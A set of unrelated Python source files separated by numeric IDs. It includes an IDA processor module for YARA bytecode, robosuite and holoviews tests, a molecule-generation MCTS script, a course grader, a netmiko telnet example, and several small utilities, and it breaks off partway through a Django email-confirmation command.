ctx.out_mnemonic()
if feature & CF_USE1:
ctx.out_one_operand(0)
if feature & CF_USE2:
ctx.out_char(',')
ctx.out_char(' ')
ctx.out_one_operand(1)
if feature & CF_USE3:
ctx.out_char(',')
ctx.out_char(' ')
ctx.out_one_operand(2)
ctx.set_gen_cmt()
ctx.flush_outbuf()
return
def notify_ana(self, insn):
# DO ONCE, hack
if self.relocations is None:
# Doing this here becuase during init the segments are not yet initialized
self.relocations = YaraProc.setup_reloc_references()
for i in range(3):
insn[i].type = o_void
insn.size = 1 # at least 1 byte
b = get_byte(insn.ea)
assert b in self.opcode_route, '@{} {:X} not recognized as opcode'.format(
insn.ea, b)
insn.itype, on, ov, of, operands = self.opcode_route[b]
if of & CF_USE1:
insn.size += YARA_OPERAND_SIZE
if of & CF_USE2:
insn.size += YARA_OPERAND_SIZE
if of & CF_USE3:
insn.size += YARA_OPERAND_SIZE
eaoffset = 1 # account for the first byte
for i, opdesc in enumerate(operands):
for k in opdesc:
v = opdesc[k]
if callable(opdesc[k]):
v, eaoffset = v(self, insn, eaoffset)
insn[i].__setattr__(k, v)
# relocated address to something
operand_ea = insn.ea+1+8*i
if operand_ea in self.relocations and insn[i].type == o_imm:
# print 'updated patch operand @', operand_ea
insn[i].type = o_mem
insn[i].addr = insn[i].value
return insn.size
def __init__(self):
processor_t.__init__(self)
self.reg_names = [
# virutal
"CS",
"DS"
]
self.reg_first_sreg = self.reg_names.index("CS")
self.reg_code_sreg = self.reg_names.index("CS")
self.reg_last_sreg = self.reg_names.index("DS")
self.reg_data_sreg = self.reg_names.index("DS")
# required for IDA
self.instruc = [
{"name": on, "feature": of} for on, ov, of, operands in opcodes
]
self.instruc_end = len(self.instruc)
# for my convenience
self.opcode_route = {}
for i, (on, ov, of, operands) in enumerate(opcodes):
self.opcode_route[ov] = (i, on, ov, of, operands)
self.relocations = None # will be initalized later
def PROCESSOR_ENTRY():
return YaraProc()
|
66306
|
HERO = {'B': 'Batman', 'J': 'Joker', 'R': 'Robin'}
OUTPUT = '{}: {}'.format
class BatmanQuotes(object):
@staticmethod
def get_quote(quotes, hero):
for i, a in enumerate(hero):
if i == 0:
hero = HERO[a]
elif a.isdigit():
quotes = quotes[int(a)]
break
return OUTPUT(hero, quotes)
|
66322
|
import unittest
import numpy as np
from .softlearning_env_test import AdapterTestClass
from softlearning.environments.adapters.robosuite_adapter import (
RobosuiteAdapter)
class TestRobosuiteAdapter(unittest.TestCase, AdapterTestClass):
# TODO(hartikainen): This is a terrible way of testing the envs.
# All the envs should be tested independently.
def create_adapter(self, domain='Sawyer', task='Lift', *args, **kwargs):
return RobosuiteAdapter(
domain,
task,
*args,
**kwargs,
has_renderer=False,
has_offscreen_renderer=False,
use_camera_obs=False)
def test_environments(self):
# Make sure that all the environments are creatable
TEST_ENVIRONMENTS = [('Sawyer', 'Lift')]
def verify_reset_and_step(domain, task):
env = RobosuiteAdapter(
domain=domain,
task=task,
has_renderer=False,
has_offscreen_renderer=False,
use_camera_obs=False)
env.reset()
env.step(env.action_space.sample())
for domain, task in TEST_ENVIRONMENTS:
verify_reset_and_step(domain, task)
def test_copy_environments(self):
domain, task = 'Sawyer', 'Lift'
env_kwargs = {
"gripper_type": "TwoFingerGripper",
"table_full_size": (0.8, 0.8, 0.8)
}
env1 = self.create_adapter(domain=domain, task=task, **env_kwargs)
env1.reset()
env2 = env1.copy()
self.assertEqual(env1.observation_keys, env2.observation_keys)
for key, value in env_kwargs.items():
self.assertEqual(getattr(env1.unwrapped, key), value)
self.assertEqual(getattr(env2.unwrapped, key), value)
domain, task = 'Sawyer', 'Lift'
robosuite_adapter_kwargs = {
'observation_keys': ('joint_pos', 'joint_vel')
}
env_kwargs = {
"gripper_type": "TwoFingerGripper",
"table_full_size": (0.8, 0.8, 0.8)
}
env1 = self.create_adapter(
domain=domain, task=task, **robosuite_adapter_kwargs, **env_kwargs)
env1.reset()
env2 = env1.copy()
for key, value in robosuite_adapter_kwargs.items():
self.assertEqual(getattr(env1, key), value)
self.assertEqual(getattr(env2, key), value)
for key, value in env_kwargs.items():
self.assertEqual(getattr(env1.unwrapped, key), value)
self.assertEqual(getattr(env2.unwrapped, key), value)
def test_fails_with_invalid_environment_kwargs(self):
domain, task = 'Sawyer', 'Lift'
robosuite_adapter_kwargs = {
'observation_keys': ('joint_pos', 'invalid_key')
}
with self.assertRaises(AssertionError):
env = self.create_adapter(
domain=domain, task=task, **robosuite_adapter_kwargs)
def test_environment_kwargs(self):
env_kwargs = {
"has_renderer": False,
"has_offscreen_renderer": False,
"use_camera_obs": False,
"control_freq": 10,
"horizon": 1000
}
env = RobosuiteAdapter(
domain='Sawyer', task='Lift', **env_kwargs)
observation1, reward, done, info = env.step(env.action_space.sample())
self.assertAlmostEqual(reward, 0.0)
for key, expected_value in env_kwargs.items():
actual_value = getattr(env.unwrapped, key)
self.assertEqual(actual_value, expected_value)
def test_render_rgb_array(self):
env = self.create_adapter()
with self.assertRaises(NotImplementedError):
env.render()
def test_render_human(self):
env = self.create_adapter()
with self.assertRaises(NotImplementedError):
env.render()
def test_fails_with_unnormalized_action_spec(self):
from robosuite.environments.sawyer_lift import SawyerLift
class UnnormalizedEnv(SawyerLift):
@property
def dof(self):
return 5
@property
def action_spec(self):
low, high = np.ones(self.dof) * -2.0, np.ones(self.dof) * 2.0
return low, high
env = UnnormalizedEnv(
has_renderer=False,
has_offscreen_renderer=False,
use_camera_obs=False)
with self.assertRaises(AssertionError):
adapter = RobosuiteAdapter(domain=None, task=None, env=env)
if __name__ == '__main__':
unittest.main()
|
66395
|
import sys
import os
# check SBMolGen_PATH setting
if os.getenv('SBMolGen_PATH') == None:
print("THe SBMolGen_PATH has not defined, please set it before use it!")
exit(0)
else:
SBMolGen_PATH=os.getenv('SBMolGen_PATH')
sys.path.append(SBMolGen_PATH+'/utils')
from subprocess import Popen, PIPE
from math import *
import random
import random as pr
import numpy as np
from copy import deepcopy
import itertools
import time
import math
import argparse
import subprocess
from keras.preprocessing import sequence
from rdkit import Chem
from rdkit.Chem import Draw
from rdkit.Chem import Descriptors
from load_model import loaded_model
from make_smile import zinc_data_with_bracket_original, zinc_processed_with_bracket
from add_node_type_zinc import chem_kn_simulation, make_input_smile,predict_smile,check_node_type,node_to_add,expanded_node
import yaml
class chemical:
def __init__(self):
self.position=['&']
self.num_atom=8
#self.vl=['\n', '&', 'C', '(', 'c', '1', 'o', '=', 'O', 'N', 'F', '[C@@H]',
#'n', '-', '#', 'S', 'Cl', '[O-]', '[C@H]', '[NH+]', '[C@]', 's', 'Br', '/', '[nH]', '[NH3+]',
#'[NH2+]', '[C@@]', '[N+]', '[nH+]', '\\', '[S@]', '[N-]', '[n+]', '[S@@]', '[S-]',
#'I', '[n-]', 'P', '[OH+]', '[NH-]', '[P@@H]', '[P@@]', '[PH2]', '[P@]', '[P+]', '[S+]',
#'[o+]', '[CH2-]', '[CH-]', '[SH+]', '[O+]', '[s+]', '[PH+]', '[PH]', '[S@@+]']
self.vl = ['\n', '&', 'C', '1', 'N', '[C@@H]', '2', '[C@H]', '(', '=', 'O', ')', 'S', 'c', '[S@]', '[nH]', '[O-]', '[N+]', 'n', 'F', '#', '[C@]', '[C@@]', '[S@@]', 'P', '/', '\\', 'Cl', 's', 'Br', 'o', '[NH3+]', 'I', '[n+]', '[nH+]', '3', '[N-]', '[S-]', 'B', '4', '5', '[NH+]', '[Si]', '[P@]', '[NH2+]', '[P@@]', '[N@+]', '6', '[N@@+]', '[S@@+]', '7', '8', '[P@@H]', '[n-]', '[C-]', '[P+]', '[Cu]', '[Ni]', '[Zn]', '[Au-]', '[OH+]']
def Clone(self):
st = chemical()
st.position= self.position[:]
return st
def SelectPosition(self,m):
self.position.append(m)
def Getatom(self):
return [i for i in range(self.num_atom)]
class Node:
def __init__(self, position = None, parent = None, state = None):
self.position = position
self.parentNode = parent
self.childNodes = []
self.child=None
self.wins = 0
self.visits = 0
self.nonvisited_atom=state.Getatom()
self.type_node=[]
self.depth=0
def Selectnode(self):
#s = sorted(self.childNodes, key = lambda c: c.wins/c.visits + 0.8*sqrt(2*log(self.visits)/c.visits))[-1]
#s=random.choice(self.childNodes)
ucb=[]
print('UCB:')
for i in range(len(self.childNodes)):
ucb_tmp = self.childNodes[i].wins/self.childNodes[i].visits+ c_val*sqrt(2*log(self.visits)/self.childNodes[i].\
visits)
ucb.append(ucb_tmp)
print(self.childNodes[i].position, ucb_tmp,)
m = np.amax(ucb)
indices = np.nonzero(ucb == m)[0]
ind=pr.choice(indices)
s=self.childNodes[ind]
print('\n', 'index', ind, self.position, m,)
return s
def Addnode(self, m, s):
n = Node(position = m, parent = self, state = s)
self.childNodes.append(n)
def simulation(self,state):
predicted_smile=predict_smile(model,state)
input_smile=make_input_smile(predicted_smile)
logp,valid_smile,all_smile=logp_calculation(input_smile)
return logp,valid_smile,all_smile
def Update(self, result):
self.visits += 1
self.wins += result
def MCTS(root, verbose = False):
"""initialization of the chemical trees and grammar trees"""
#run_time=time.time()+3600*48
start_time = time.time()
run_time = time.time() + 3600*hours # 3600*24
rootnode = Node(state = root)
state = root.Clone()
"""----------------------------------------------------------------------"""
"""global variables used for save valid compounds and simulated compounds"""
valid_compound=[]
all_simulated_compound=[]
desired_compound=[]
max_logp=[]
desired_activity=[]
depth=[]
min_score=1000
score_distribution=[]
min_score_distribution=[]
generated_dict = {} #dictionary of generated compounds
dict_id = 1 ## this id used for save best docking pose.
"""----------------------------------------------------------------------"""
out_f = open(output_dir, 'a')
while time.time()<=run_time:
node = rootnode # important ! this node is different with state / node is the tree node
state = root.Clone() # but this state is the state of the initialization . too important !!!
"""selection step"""
node_pool=[]
while node.childNodes!=[]:
node = node.Selectnode()
state.SelectPosition(node.position)
print("state position:,",state.position)
if len(state.position)>= 70:
re= -1.0
while node != None:
node.Update(re)
node = node.parentNode
continue
if node.position == '\n':
re = -1.0
while node != None:
node.Update(re)
node = node.parentNode
continue
"""------------------------------------------------------------------"""
"""expansion step"""
expanded=expanded_node(model,state.position,val,loop_num_nodeExpansion)
new_compound = []
nodeadded = []
for n in range(simulation_num):
nodeadded_tmp = node_to_add(expanded, val)
all_posible=chem_kn_simulation(model,state.position,val,nodeadded_tmp)
generate_smile=predict_smile(all_posible,val)
new_compound_tmp = make_input_smile(generate_smile)
nodeadded.extend(nodeadded_tmp)
new_compound.extend(new_compound_tmp)
print('nodeadded', nodeadded)
print('new compound', new_compound)
print('generated_dict', generated_dict)
print('dict_id', dict_id)
for comp in new_compound:
print('lastcomp', comp[-1], ' ... ',comp[-1] == '\n')
node_index,rdock_score,valid_smile,generated_dict = check_node_type(new_compound, score_type, generated_dict, sa_threshold = sa_threshold, rule = rule5, radical = radical_check, docking_num = docking_num, target_dir = target_dir, hashimoto_filter = hashimoto_filter, dict_id = dict_id, trial = trial)
valid_compound.extend(valid_smile)
score_distribution.extend(rdock_score)
print('node', node_index, 'rdock_score', rdock_score, 'valid', valid_smile)
#out_f = open(output_dir, 'a')
#out_f.write(str(valid_smile) + ', '+ str(rdock_score)+', '+str(min_score)+', '+str(len(state.position)))
out_f.write(str(valid_smile) + ', '+ str(rdock_score)+', '+str(min_score)+', '+str(len(state.position))+', '+str(time.time()-start_time))
out_f.write('\n')
out_f.flush()
#out_f.close()
dict_id += 1
if len(node_index)==0:
re=-1.0
while node != None:
node.Update(re)
node = node.parentNode
else:
re_list = []
#atom_list = [nodeadded[m] for m in node_index]
atom_checked = []
for i in range(len(node_index)):
m=node_index[i]
atom = nodeadded[m]
if atom not in atom_checked:
node.Addnode(atom, state)
node_pool.append(node.childNodes[len(atom_checked)])
depth.append(len(state.position))
atom_checked.append(atom)
else:
node_pool.append(node.childNodes[atom_checked.index(atom)])
#node.Addnode(nodeadded[m],state)
#node.Addnode(nodeadded[m],state)
#print valid_smile[i], 'node m', m, 'nodeadded[m]', nodeadded[m], 'node.childNodes[i]', node.childNodes[i]
for child in node.childNodes:
print(child.position)
print('\n')
#node_pool.append(node.childNodes[i])
#depth.append(len(state.position))
score_index = 0 if score_type == 'SCORE' else 1
print("current minmum score",min_score)
if rdock_score[i][score_index]<=min_score:
min_score_distribution.append(rdock_score[i][score_index])
min_score=rdock_score[i][score_index]
else:
min_score_distribution.append(min_score)
"""simulation"""
if atom == '\n':
re = -1
else:
#re=(- (rdock_score[i][score_index] + 20)*0.1)/(1+abs(rdock_score[i][score_index] + 20)*0.1)
re=(- (rdock_score[i][score_index] - base_rdock_score)*0.1)/(1+abs(rdock_score[i][score_index] -base_rdock_score)*0.1)
#### pj16 reward fuction:
#base_rdock_score = -20
#reward = (np.tanh(0.1*(abs(rdock_score[max_index])+base_rdock_score)) + 1)/2
re_list.append(re)
print('atom', atom, 're_list', re_list)
#re=(- (rdock_score[i]/100))/(1+abs(rdock_score[i]/100))
"""backpropation step"""
for i in range(len(node_pool)):
node=node_pool[i]
while node != None:
node.Update(re_list[i])
node = node.parentNode
for child in node_pool:
print(child.position, child.wins, child.visits)
out_f.close()
"""check if found the desired compound"""
#print "all valid compounds:",valid_compound
#print "all active compounds:",desired_compound
print("rdock_score",score_distribution)
print("num valid_compound:",len(valid_compound))
print("valid compounds",valid_compound)
print("depth",depth)
print("min_score",min_score_distribution)
return valid_compound
def UCTchemical():
one_search_start_time=time.time()
time_out=one_search_start_time+60*10
state = chemical()
best = MCTS(root = state,verbose = False)
return best
if __name__ == "__main__":
# set parameter
argvs = sys.argv
"""read yaml file for configuration"""
f = open(str(argvs[1]), "r+")
conf = yaml.load(f, Loader=yaml.SafeLoader)
f.close()
trial = conf.get('trial', 1)
c_val = conf.get('c_val', 1.0)
loop_num_nodeExpansion = conf.get('loop_num_nodeExpansion', 1000)
target = conf.get('target', 'CDK2')
target_dir = conf.get('target_path', './')
hours = conf.get('hours', 1)
score_type = conf.get('score_type', 'SCORE.INTER') #<SCORE> or <SCORE.INTER>
docking_num = conf.get('docking_num', 10)
sa_threshold = conf.get('sa_threshold', 3.5) #if SA > sa_threshold, score = 0. Default sa_threshold = 10
#RO5: if a compound does not satisfy rule of 5, score = 0.
rule5 = conf.get('rule5', 1) #0:none, 1: rule of 5, 2: rule of 3
radical_check = conf.get('radical_check', True)
simulation_num = conf.get('simulation_num', 3)
hashimoto_filter = conf.get('hashimoto_filter', True) # or False, use/not use hashimoto filter
base_rdock_score = conf.get('base_rdock_score', -20)
model_name = conf.get('model_name', 'model')
print('========== display configuration ==========')
print('trial num is: ', trial)
print('c_val: ', c_val)
print('loop_num_nodeExpansion: ', loop_num_nodeExpansion)
print('target: ', target)
print('target_dir: ',target_dir)
print('max run time: ',hours)
print('score_type: ', score_type)
print('docking_num: ',docking_num)
print('sa_threshold: ',sa_threshold)
print('model_name: ', model_name)
print('base_rdock_score: ', base_rdock_score)
print('simulation_num: ',simulation_num)
print('hashimoto_filter: ', hashimoto_filter)
"""----------------------------------------------------------------------"""
output_dir = 'result_'+target+'_C'+str(c_val)+'_trial'+str(trial)+'.txt'
smile_old=zinc_data_with_bracket_original(SBMolGen_PATH + '/data/250k_rndm_zinc_drugs_clean.smi')
val,smile=zinc_processed_with_bracket(smile_old)
print('val is ', val)
out_f = open(output_dir, 'w')
out_f.write('#valid_smile, rdock_score, min_score, depth, used_time')
out_f.write('\n')
out_f.close()
model=loaded_model(SBMolGen_PATH + '/RNN-model/'+ model_name) #WM300 not tested
valid_compound=UCTchemical()
|
66401
|
import sys
import numpy as np
from matplotlib import pyplot
from matplotlib.animation import FuncAnimation
import matplotlib as mpl
sys.path.append('..')
from submission import SubmissionBase
def displayData(X, example_width=None, figsize=(10, 10)):
"""
Displays 2D data in a nice grid.
Parameters
----------
X : array_like
The input data of size (m x n) where m is the number of examples and n is the number of
features.
example_width : int, optional
THe width of each 2-D image in pixels. If not provided, the image is assumed to be square,
and the width is the floor of the square root of total number of pixels.
figsize : tuple, optional
A 2-element tuple indicating the width and height of figure in inches.
"""
# Compute rows, cols
if X.ndim == 2:
m, n = X.shape
elif X.ndim == 1:
n = X.size
m = 1
X = X[None] # Promote to a 2 dimensional array
else:
raise IndexError('Input X should be 1 or 2 dimensional.')
example_width = example_width or int(np.round(np.sqrt(n)))
example_height = int(n / example_width)
# Compute number of items to display
display_rows = int(np.floor(np.sqrt(m)))
display_cols = int(np.ceil(m / display_rows))
fig, ax_array = pyplot.subplots(display_rows, display_cols, figsize=figsize)
fig.subplots_adjust(wspace=0.025, hspace=0.025)
ax_array = [ax_array] if m == 1 else ax_array.ravel()
for i, ax in enumerate(ax_array):
ax.imshow(X[i].reshape(example_height, example_width, order='F'), cmap='gray')
ax.axis('off')
def featureNormalize(X):
"""
Normalizes the features in X returns a normalized version of X where the mean value of each
feature is 0 and the standard deviation is 1. This is often a good preprocessing step to do when
working with learning algorithms.
Parameters
----------
X : array_like
An dataset which is a (m x n) matrix, where m is the number of examples,
and n is the number of dimensions for each example.
Returns
-------
X_norm : array_like
The normalized input dataset.
mu : array_like
A vector of size n corresponding to the mean for each dimension across all examples.
sigma : array_like
A vector of size n corresponding to the standard deviations for each dimension across
all examples.
"""
mu = np.mean(X, axis=0)
X_norm = X - mu
sigma = np.std(X_norm, axis=0, ddof=1)
X_norm /= sigma
return X_norm, mu, sigma
def plotProgresskMeans(i, X, centroid_history, idx_history):
"""
A helper function that displays the progress of k-Means as it is running. It is intended for use
only with 2D data. It plots data points with colors assigned to each centroid. With the
previous centroids, it also plots a line between the previous locations and current locations
of the centroids.
Parameters
----------
i : int
Current iteration number of k-means. Used for matplotlib animation function.
X : array_like
The dataset, which is a matrix (m x n). Note since the plot only supports 2D data, n should
be equal to 2.
centroid_history : list
A list of computed centroids for all iteration.
idx_history : list
A list of computed assigned indices for all iterations.
"""
K = centroid_history[0].shape[0]
pyplot.gcf().clf()
cmap = pyplot.cm.rainbow
norm = mpl.colors.Normalize(vmin=0, vmax=2)
for k in range(K):
current = np.stack([c[k, :] for c in centroid_history[:i+1]], axis=0)
pyplot.plot(current[:, 0], current[:, 1],
'-Xk',
mec='k',
lw=2,
ms=10,
mfc=cmap(norm(k)),
mew=2)
pyplot.scatter(X[:, 0], X[:, 1],
c=idx_history[i],
cmap=cmap,
marker='o',
s=8**2,
linewidths=1,)
pyplot.grid(False)
pyplot.title('Iteration number %d' % (i+1))
def runkMeans(X, centroids, findClosestCentroids, computeCentroids,
max_iters=10, plot_progress=False):
"""
Runs the K-means algorithm.
Parameters
----------
X : array_like
The data set of size (m, n). Each row of X is a single example of n dimensions. The
data set is a total of m examples.
centroids : array_like
Initial centroid location for each clusters. This is a matrix of size (K, n). K is the total
number of clusters and n is the dimensions of each data point.
findClosestCentroids : func
A function (implemented by student) reference which computes the cluster assignment for
each example.
computeCentroids : func
A function(implemented by student) reference which computes the centroid of each cluster.
max_iters : int, optional
Specifies the total number of interactions of K-Means to execute.
plot_progress : bool, optional
A flag that indicates if the function should also plot its progress as the learning happens.
This is set to false by default.
Returns
-------
centroids : array_like
A (K x n) matrix of the computed (updated) centroids.
idx : array_like
A vector of size (m,) for cluster assignment for each example in the dataset. Each entry
in idx is within the range [0 ... K-1].
anim : FuncAnimation, optional
A matplotlib animation object which can be used to embed a video within the jupyter
notebook. This is only returned if `plot_progress` is `True`.
"""
K = centroids.shape[0]
idx = None
idx_history = []
centroid_history = []
for i in range(max_iters):
idx = findClosestCentroids(X, centroids)
if plot_progress:
idx_history.append(idx)
centroid_history.append(centroids)
centroids = computeCentroids(X, idx, K)
if plot_progress:
fig = pyplot.figure()
anim = FuncAnimation(fig, plotProgresskMeans,
frames=max_iters,
interval=500,
repeat_delay=2,
fargs=(X, centroid_history, idx_history))
return centroids, idx, anim
return centroids, idx
class Grader(SubmissionBase):
# Random Test Cases
X = np.sin(np.arange(1, 166)).reshape(15, 11, order='F')
Z = np.cos(np.arange(1, 122)).reshape(11, 11, order='F')
C = Z[:5, :]
idx = np.arange(1, 16) % 3
def __init__(self):
part_names = ['Find Closest Centroids (k-Means)',
'Compute Centroid Means (k-Means)',
'PCA',
'Project Data (PCA)',
'Recover Data (PCA)']
super().__init__('k-means-clustering-and-pca', part_names)
def __iter__(self):
for part_id in range(1, 6):
try:
func = self.functions[part_id]
# Each part has different expected arguments/different function
if part_id == 1:
res = 1 + func(self.X, self.C)
elif part_id == 2:
res = func(self.X, self.idx, 3)
elif part_id == 3:
U, S = func(self.X)
res = np.hstack([U.ravel('F'), np.diag(S).ravel('F')]).tolist()
elif part_id == 4:
res = func(self.X, self.Z, 5)
elif part_id == 5:
res = func(self.X[:, :5], self.Z, 5)
else:
raise KeyError
yield part_id, res
except KeyError:
yield part_id, 0
|
66460
|
C = "C"
CPP = "Cpp"
CSHARP = "CSharp"
GO = "Go"
JAVA = "Java"
JAVASCRIPT = "JavaScript"
OBJC = "ObjC"
PYTHON = "Python" # synonym for PYTHON3
PYTHON2 = "Python2"
PYTHON3 = "Python3"
RUST = "Rust"
SWIFT = "Swift"
def supported():
"""Returns the supported languages.
Returns:
the list of supported languages.
"""
return [C, CPP, GO, JAVA, OBJC, PYTHON, PYTHON2, PYTHON3]
|
66469
|
from fjord.base.plugin_utils import load_providers
from fjord.redirector import _REDIRECTORS
class RedirectorTestMixin(object):
"""Mixin that loads Redirectors specified with ``redirectors`` attribute"""
redirectors = []
def setUp(self):
_REDIRECTORS[:] = load_providers(self.redirectors)
super(RedirectorTestMixin, self).setUp()
def tearDown(self):
_REDIRECTORS[:] = []
super(RedirectorTestMixin, self).tearDown()
|
66481
|
import ui, console
import os
import math
def save_action(sender):
with open('image_file.png', 'wb') as fp:
fp.write(img.to_png())
console.hud_alert('image saved in the file image_file.png')
def showimage_action(sender):
img.show()
def create_image():
img = None
with ui.ImageContext(500, 500) as ctx:
path = ui.Path.oval(50,50,400, 100)
ui.set_color((1.0, 0.4, 0.4, 1.0))
path.fill()
path.line_width = 10.0
ui.set_color((0.8, 1.0, 0.5, 1.0))
path.stroke()
ui.draw_string('Label', rect=(50,175,400,100),
font=tuple(('Georgia', 20)),
color=(0.4, 0.6, 1.0, 1.0), alignment=0,
line_break_mode=4)
ui.Image("Dog_Face").draw(50,200,300,300)
img = ctx.get_image()
return img
img = create_image()
#img.show()
main_view = ui.View(frame=(0,0,500,500))
imgview = ui.ImageView(frame=(0,0,500,500))
imgview.image = img
main_view.add_subview(imgview)
save_button = ui.ButtonItem()
save_button.title = 'Save'
save_button.action = save_action
show_button = ui.ButtonItem()
show_button.title = 'Show'
show_button.action = showimage_action
main_view.right_button_items = [save_button, show_button]
main_view.present('sheet')
|
66566
|
import os
import time
from getpass import getpass
from netmiko import ConnectHandler
def read_device(net_connect, sleep=1):
"""Sleep and read channel."""
time.sleep(sleep)
output = net_connect.read_channel()
print(output)
return output
if __name__ == "__main__":
# Code so automated tests will run properly
password = (
os.getenv("NETMIKO_PASSWORD") if os.getenv("NETMIKO_PASSWORD") else getpass()
)
my_device = {
"device_type": "cisco_ios",
"host": "cisco3.lasthop.io",
"username": "pyclass",
"password": password,
"session_log": "output.txt",
}
with ConnectHandler(**my_device) as net_connect:
print()
print(net_connect.find_prompt())
cmd = "telnet 10.220.88.22\n"
net_connect.write_channel(cmd)
output = read_device(net_connect, sleep=1)
if "sername" in output:
net_connect.write_channel(my_device["username"] + "\n")
output = read_device(net_connect, sleep=1)
if "ssword" in output:
net_connect.write_channel(password + "\n")
read_device(net_connect, sleep=1)
net_connect.write_channel("exit\n")
read_device(net_connect, sleep=1)
print()
|
66568
|
import logging
import requests
from tenacity import before_log, retry, stop_after_attempt
class MarketDataClient(object):
logger = logging.getLogger(__name__)
base_url = 'http://market-data:8000'
def _make_request(self, url):
response = requests.get(
f"{self.base_url}/{url}", headers={'content-type': 'application/json'})
return response.json()
@retry(stop=stop_after_attempt(3),
before=before_log(logger, logging.DEBUG))
def all_prices(self):
return self._make_request("prices")
def price(self, code):
return self._make_request(f"prices/{code}")
|
66572
|
from os import listdir
from os import path
import io
import json
save_apsnypress = io.open('../hunalign_batch_apsnypress.txt','w+', encoding="utf-8")
with open('../data_out.json', 'r') as f:
data_j = json.load(f)
for item in data_j:
if len(item["possible match"]) != 0:
for possible_item in item["possible match"]:
save_apsnypress.write('./ab/'+item["name"]+'.txt'+'\t'+'./ru/'+possible_item+'.txt'+'\t'+'./aligned/'+item["name"]+'_'+possible_item+'.txt'+'\n')
|
66576
|
from unittest import SkipTest
from holoviews.core import NdOverlay
from holoviews.core.util import pd
from holoviews.element import Segments
from .test_plot import TestBokehPlot, bokeh_renderer
try:
from bokeh.models import FactorRange
except:
pass
class TestSegmentPlot(TestBokehPlot):
def test_segments_color_selection_nonselection(self):
opts = dict(color='green', selection_color='red', nonselection_color='blue')
segments = Segments([(i, i*2, i*3, i*4, i*5, chr(65+i)) for i in range(10)],
vdims=['a', 'b']).opts(**opts)
plot = bokeh_renderer.get_plot(segments)
glyph_renderer = plot.handles['glyph_renderer']
self.assertEqual(glyph_renderer.glyph.line_color, 'green')
self.assertEqual(glyph_renderer.selection_glyph.line_color, 'red')
self.assertEqual(glyph_renderer.nonselection_glyph.line_color, 'blue')
def test_segments_alpha_selection_nonselection(self):
opts = dict(alpha=0.8, selection_alpha=1.0, nonselection_alpha=0.2)
segments = Segments([(i, i*2, i*3, i*4, i*5, chr(65+i)) for i in range(10)],
vdims=['a', 'b']).opts(**opts)
plot = bokeh_renderer.get_plot(segments)
glyph_renderer = plot.handles['glyph_renderer']
self.assertEqual(glyph_renderer.glyph.line_alpha, 0.8)
self.assertEqual(glyph_renderer.selection_glyph.line_alpha, 1)
self.assertEqual(glyph_renderer.nonselection_glyph.line_alpha, 0.2)
def test_segments_overlay_hover(self):
obj = NdOverlay({
i: Segments((range(31), range(31),range(1, 32), range(31)))
for i in range(5)
}, kdims=['Test']).opts({'Segments': {'tools': ['hover']}})
tooltips = [
('Test', '@{Test}'),
('x0', '@{x0}'),
('y0', '@{y0}'),
('x1', '@{x1}'),
('y1', '@{y1}')
]
self._test_hover_info(obj, tooltips)
def test_segments_overlay_datetime_hover(self):
if pd is None:
raise SkipTest("Test requires pandas")
obj = NdOverlay({
i: Segments((
list(pd.date_range('2016-01-01', '2016-01-31')),
range(31),
pd.date_range('2016-01-02', '2016-02-01'),
range(31)
))
for i in range(5)
}, kdims=['Test']).opts({'Segments': {'tools': ['hover']}})
tooltips = [
('Test', '@{Test}'),
('x0', '@{x0}{%F %T}'),
('y0', '@{y0}'),
('x1', '@{x1}{%F %T}'),
('y1', '@{y1}')
]
formatters = {'@{x0}': "datetime", '@{x1}': "datetime"}
self._test_hover_info(obj, tooltips, formatters=formatters)
def test_segments_categorical_xaxis(self):
segments = Segments((['A', 'B', 'C'], [1, 2, 3], ['A', 'B', 'C'], [4, 5, 6]))
plot = bokeh_renderer.get_plot(segments)
x_range = plot.handles['x_range']
self.assertIsInstance(x_range, FactorRange)
self.assertEqual(x_range.factors, ['A', 'B', 'C'])
def test_segments_categorical_yaxis(self):
segments = Segments(([1, 2, 3], ['A', 'B', 'C'], [4, 5, 6], ['A', 'B', 'C']))
plot = bokeh_renderer.get_plot(segments)
y_range = plot.handles['y_range']
self.assertIsInstance(y_range, FactorRange)
self.assertEqual(y_range.factors, ['A', 'B', 'C'])
def test_segments_categorical_yaxis_invert_axes(self):
segments = Segments(([1, 2, 3], ['A', 'B', 'C'], [4, 5, 6], ['A', 'B', 'C']))
plot = bokeh_renderer.get_plot(segments)
y_range = plot.handles['y_range']
self.assertIsInstance(y_range, FactorRange)
self.assertEqual(y_range.factors, ['A', 'B', 'C'])
def test_segments_overlay_categorical_yaxis(self):
segments = Segments(([1, 2, 3], ['A', 'B', 'C'], [4, 5, 6], ['A', 'B', 'C']))
segments2 = Segments(([1, 2, 3], ['B', 'C', 'D'], [4, 5, 6], ['B', 'C', 'D']))
plot = bokeh_renderer.get_plot(segments*segments2)
y_range = plot.handles['y_range']
self.assertIsInstance(y_range, FactorRange)
self.assertEqual(y_range.factors, ['A', 'B', 'C', 'D'])
def test_segments_overlay_categorical_yaxis_invert_axis(self):
segments = Segments(([1, 2, 3], ['A', 'B', 'C'], [4, 5, 6], ['A', 'B', 'C'])).opts(invert_yaxis=True)
segments2 = Segments(([1, 2, 3], ['B', 'C', 'D'], [4, 5, 6], ['B', 'C', 'D']))
plot = bokeh_renderer.get_plot(segments*segments2)
y_range = plot.handles['y_range']
self.assertIsInstance(y_range, FactorRange)
self.assertEqual(y_range.factors, ['A', 'B', 'C', 'D'][::-1])
def test_segments_overlay_categorical_yaxis_invert_axes(self):
segments = Segments(([1, 2, 3], ['A', 'B', 'C'], [4, 5, 6], ['A', 'B', 'C'])).opts(invert_axes=True)
segments2 = Segments(([1, 2, 3], ['B', 'C', 'D'], [4, 5, 6], ['B', 'C', 'D']))
plot = bokeh_renderer.get_plot(segments*segments2)
x_range = plot.handles['x_range']
self.assertIsInstance(x_range, FactorRange)
self.assertEqual(x_range.factors, ['A', 'B', 'C', 'D'])
|
66584
|
from dataclasses import dataclass
@dataclass
class Division:
id: int = None
name: str = None
link: str = None
|
66591
|
from django.core.management.base import BaseCommand, CommandError
from django.urls import reverse
from django.core.mail import send_mail
from django.template.loader import get_template, render_to_string
from django.conf import settings
from django.contrib.sites.models import Site
from accounts.models import Account, EmailConfirmation, EmailRecord
import time
import urllib
import datetime
class Command(BaseCommand):
help = "Sends confirmation emails to accounts that haven't been confirmed yet"
def add_arguments(self, parser):
parser.add_argument('-d','--days-since-last', dest='days', type=int, default=None)
def handle(self, *args, **options):
site = Site.objects.get(id=1)
accounts = Account.objects.filter(is_email_confirmed=False)
for account in accounts:
if not account.user.email:
break # Skip accounts without an email
confirmation_request = EmailConfirmation.objects.filter(user=account.user)
if 'days' in options and options.get('days', None):
